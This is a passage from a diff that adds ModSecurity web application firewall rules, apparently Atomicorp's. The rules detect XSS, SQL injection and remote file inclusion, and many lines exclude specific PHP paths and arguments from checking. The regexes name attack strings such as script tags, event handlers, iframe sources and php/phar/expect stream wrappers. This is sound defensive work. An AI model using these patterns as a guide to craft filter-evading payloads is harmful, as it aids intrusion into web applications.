?/?i?frame|\%env)"  	"phase:2,deny,log,auditlog,status:403,t:none,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340835,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic XSS filter'"
+SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:/move/|!ARGS:option[vbpclosedreason]|!ARGS:embeddump|!ARGS:changes|!ARGS:welcome|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:verbiage|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:preview__hidden|!ARGS:order|!ARGS:youtube|!ARGS:/post/|!ARGS:reply|!ARGS:business|!ARGS:navig|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:/page/|!ARGS:/homePage/|!ARGS:Post|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/submit/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?((img|i?frame) ?src|a ?href) ?= ?(ogg|tls|ssl|gopher|zlib|(ht|f)tps?):/|alert ?\(|<? ((java|vb)?script|applet|activex|chrome) ?>|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?>|< ?/?i?frame|\%env)"  	"phase:2,deny,log,auditlog,status:403,multiMatch,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340836,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack'"
+SecRule REQUEST_URI|ARGS|!ARGS:/move/|!ARGS:embeddump|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:changes|!ARGS:/contenido/|!ARGS:/tekst/|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:verbiage|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:usr1|!ARGS:resolution|!ARGS:problem|!ARGS:/^product_options/|!ARGS:eintrag|!ARGS:/edit/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:Returnid|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:order|!ARGS:youtube|!ARGS:business|!ARGS:/homePage/|!ARGS:/post/|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:meta_info|!ARGS:ta|!ARGS:/data/|!ARGS:search_theme_form_keys|ARGS_NAMES|!ARGS_NAMES:user[click_or_onmouseover]|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:user[usertitle]|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/note/|!ARGS:/xml/|!ARGS:/^doc/|!ARGS:/desc/|!ARGS:tekst|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:/submit/|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|\" ?> ?<|(?:\.add|\@)import|asfunction\:|background-image\:|e(?:cma|xec)script|\.fromcharcode|get(?:parentfolder|specialfolder)|iframe |\.innerhtml|\< ?input|(?:java|live|j|vb)script!s|lowsrc|mocha\:|!(i|t)on(?:abort|blur|change|click!s|dragdrop|focus|keydown|keypress|keyup)|onmouse(?:down|move|out|over|up)|script |shell\:|window\.location|asfunction:_root\.launch|\%env)" 	"phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340837,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack'"
+
+SecMarker END_RULES_91543
+
+SecRule REQUEST_FILENAME "/forum/post\.php" "phase:2,id:91544,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009"
+
+SecRule REQUEST_FILENAME "/crop_auto\.php" "phase:2,id:91545,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340008"
+
+SecRule REQUEST_FILENAME "/admin/main\.php" "phase:2,id:91546,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/thumb\.php" "phase:2,id:91547,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340161,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/com_virtuemart/fetchscript\.php" "phase:2,id:91548,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340026"
+
+SecRule REQUEST_FILENAME "/uploader\.php" "phase:2,id:91549,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/survey/preview\.php" "phase:2,id:91550,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+SecAction "phase:2,id:91551,t:none,pass,nolog,skipAfter:END_RULES_91551"
+
+SecRule REQUEST_URI|ARGS|!ARGS:/survey/|ARGS_NAMES|!ARGS:ticket_response|!ARGS:/element/|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:embeddump|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/submit/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:script|about|applet|activex|chrome).*(?:script|about|applet|activex|chrome) ?>|> ?< ?(img ?src|a ?href) ?= ?(ht|f)tps?:/|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?(>|<)|< ?/?i?frame|\%env)"  	"phase:2,deny,log,auditlog,status:403,t:none,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340840,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic XSS filter'"
+
+# Rule 340148:  XSS injection
+SecRule REQUEST_URI|ARGS|!ARGS:/survey/|ARGS_NAMES|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:embeddump|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:verbiage|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:preview__hidden|!ARGS:order|!ARGS:youtube|!ARGS:/post/|!ARGS:reply|!ARGS:business|!ARGS:navig|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:/page/|!ARGS:/homePage/|!ARGS:Post|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/submit/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?((img|i?frame) ?src|a ?href) ?= ?(ogg|tls|ssl|gopher|zlib|(ht|f)tps?):/|alert ?\(|<? ((java|vb)?script|applet|activex|chrome) ?>|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?>|< ?/?i?frame|\%env)"  	"phase:2,deny,log,auditlog,status:403,multiMatch,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340841,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack'"
+
+# Rule 340149:  XSS injection
+SecRule REQUEST_URI|ARGS|!ARGS:/survey/|!ARGS:embeddump|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/tekst/|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:verbiage|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:usr1|!ARGS:resolution|!ARGS:problem|!ARGS:/^product_options/|!ARGS:eintrag|!ARGS:/edit/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:Returnid|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:order|!ARGS:youtube|!ARGS:business|!ARGS:/homePage/|!ARGS:/post/|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:meta_info|!ARGS:ta|!ARGS:/data/|!ARGS:search_theme_form_keys|ARGS_NAMES|!ARGS_NAMES:user[click_or_onmouseover]|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:user[usertitle]|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/note/|!ARGS:/xml/|!ARGS:/^doc/|!ARGS:/desc/|!ARGS:tekst|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:/submit/|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|\" ?> ?<|(?:\.add|\@)import|asfunction\:|background-image\:|e(?:cma|xec)script|\.fromcharcode|get(?:parentfolder|specialfolder)|iframe |\.innerhtml|\< ?input|(?:java|live|j|vb)script!s|lowsrc|mocha\:|!(i|t)on(?:abort|blur|change|click!s|dragdrop|focus|keydown|keypress|keyup)|onmouse(?:down|move|out|over|up)|script |shell\:|window\.location|asfunction:_root\.launch|\%env)" 	"phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340842,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack'"
+
+SecMarker END_RULES_91551
+
+SecRule REQUEST_FILENAME "/linkmachine\.php" "phase:2,id:91552,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/productadd\.php" "phase:2,id:91553,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340144"
+SecAction "phase:2,id:91554,t:none,pass,nolog,skipAfter:END_RULES_91554"
+
+SecRule ARGS|!ARGS:create|!ARGS:postpagetext|!ARGS:display_query|!ARGS:Db_submit|!ARGS:prev_sql_query|!ARGS:sql_query|!ARGS:Post|!ARGS:text|!ARGS:action|!ARGS:op|!ARGS:setup_db|!ARGS:wptextbox1|!ARGS:message|!ARGS:/^SQL/|!ARGS:query_string|!ARGS:query|!ARGS:description "(?:(?:alter|create|drop)[[:space:]]*(?:column|database|procedure|table)|delete[[:space:]]*update.+set.+=)"  "t:none,t:urlDecodeUni,t:compressWhitespace,t:lowercase,phase:2,deny,log,auditlog,status:403,id:340843,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection 2'"
+
+SecMarker END_RULES_91554
+
+SecRule REQUEST_FILENAME "/admint/" "phase:2,id:91555,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/setupctcform\.php" "phase:2,id:91556,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/db\.php" "phase:2,id:91557,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380019"
+
+
+SecRule REQUEST_FILENAME "/admin-translate/" "phase:2,id:91558,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/mailtemplate_outpay1_result\.php" "phase:2,id:91559,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/" "phase:2,id:91560,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/supportannouncements\.php" "phase:2,id:91561,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/socialware/popups/add_friend\.php" "phase:2,id:91562,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340161"
+
+SecRule REQUEST_FILENAME "/open\.php" "phase:2,id:91563,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:91564,t:none,pass,nolog,skipAfter:END_RULES_91564"
+
+SecRule ARGS|!ARGS:/site/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:q "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,capture,id:340844,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/site/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:q "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,capture,id:340845,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecMarker END_RULES_91564
+
+SecRule REQUEST_FILENAME "/order/totals\.php" "phase:2,id:91565,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+SecAction "phase:2,id:91566,t:none,pass,nolog,skipAfter:END_RULES_91566"
+
+SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:/token/|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:ticket_response|!ARGS:/element/|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:embeddump|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/submit/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:script|about|applet|activex|chrome).*(?:script|about|applet|activex|chrome) ?>|> ?< ?(img ?src|a ?href) ?= ?(ht|f)tps?:/|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?(>|<)|< ?/?i?frame|\%env)" 	"phase:2,deny,log,auditlog,status:403,t:none,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340846,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic XSS filter'"
+
+SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:token/|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:embeddump|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:verbiage|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:preview__hidden|!ARGS:order|!ARGS:youtube|!ARGS:/post/|!ARGS:reply|!ARGS:business|!ARGS:navig|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:/page/|!ARGS:/homePage/|!ARGS:Post|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/submit/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?((img|i?frame) ?src|a ?href) ?= ?(ogg|tls|ssl|gopher|zlib|(ht|f)tps?):/|alert ?\(|<? ((java|vb)?script|applet|activex|chrome) ?>|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?>|< ?/?i?frame|\%env)"  	